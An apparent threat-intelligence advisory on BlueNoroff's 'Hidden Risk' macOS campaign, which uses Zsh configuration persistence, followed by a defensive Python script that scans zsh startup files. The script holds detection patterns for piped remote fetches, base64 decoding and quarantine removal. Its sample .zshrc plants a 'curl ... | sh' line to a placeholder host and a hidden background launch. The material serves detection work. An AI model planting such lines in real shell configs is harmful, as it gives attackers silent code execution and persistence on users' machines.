BlueNoroff used macOS malware with novel persistence
Essential information
- Published: 08/11/2024 00:02
- Modified: 08/11/2024 10:22
- Tags: 2024-11-08 apt cryptocurrency growth lessonone macos north korea persistence phishing
- Related entities: 1 intrusion set (APT), 6 techniques (MITRE), 2 malware, 1 other
Description
SentinelLabs researchers identified a North Korea-linked threat actor targeting cryptocurrency businesses with new macOS malware in a campaign they call 'Hidden Risk'. The attackers, attributed to BlueNoroff, used fake cryptocurrency news emails and a malicious application disguised as a PDF to deliver multi-stage malware. The malware uses a novel persistence technique that abuses the Zsh configuration file, which lets it persist without triggering the macOS notifications that accompany more common persistence mechanisms. The campaign has been active since July 2024 and shows BlueNoroff's continued focus on the crypto and Web3 sectors with evolving tactics.
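As an added defender-side example (not code from the SentinelLabs report or from this page), the following Python audit scans a user's zsh startup files for the kind of planted commands that shell-config persistence relies on. The file list and the heuristics are assumptions, since the page names only "the Zsh configuration file" without saying which, and the sample .zshrc is constructed.

```python
import re
from pathlib import Path

# Startup files zsh reads for login and interactive shells. Assumed list;
# the advisory does not say which file the malware modifies.
ZSH_STARTUP_FILES = [".zshenv", ".zprofile", ".zshrc", ".zlogin"]

# Heuristics for content that rarely belongs in a shell startup file:
# remote fetch piped into a shell, base64-decoded payloads, executables in
# hidden home directories, background launches, quarantine-flag removal.
SUSPICIOUS_PATTERNS = {
    "remote-fetch-to-shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),
    "base64-decode": re.compile(r"base64\s+(-d|--decode|-D)\b"),
    "hidden-path-exec": re.compile(r"(~|\$HOME)/\.[^/\s]+/\S*"),
    "background-launch": re.compile(r"&\s*$|\bnohup\b|\bdisown\b"),
    "quarantine-bypass": re.compile(r"xattr\s+.*com\.apple\.quarantine"),
}


def scan_zsh_config(text: str):
    """Return (line_number, rule, line) for every non-comment line that matches."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for rule, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(stripped):
                hits.append((n, rule, stripped))
    return hits


def scan_home(home: Path = Path.home()):
    """Scan each zsh startup file under a home directory; missing files are skipped."""
    report = {}
    for name in ZSH_STARTUP_FILES:
        path = home / name
        if path.is_file():
            report[str(path)] = scan_zsh_config(path.read_text(errors="replace"))
    return report


# Constructed sample: two benign lines followed by two planted lines.
SAMPLE_ZSHRC = """\
export PATH="$HOME/bin:$PATH"
alias ll='ls -la'
curl -s https://placeholder.invalid/x | sh   # constructed, not a real indicator
nohup ~/.cache/.updater >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    for n, rule, line in scan_zsh_config(SAMPLE_ZSHRC):
        print(f"line {n}: {rule}: {line}")
```

Run it against a real home directory with `scan_home()`; the heuristics are intentionally broad, so treat hits as review items rather than verdicts.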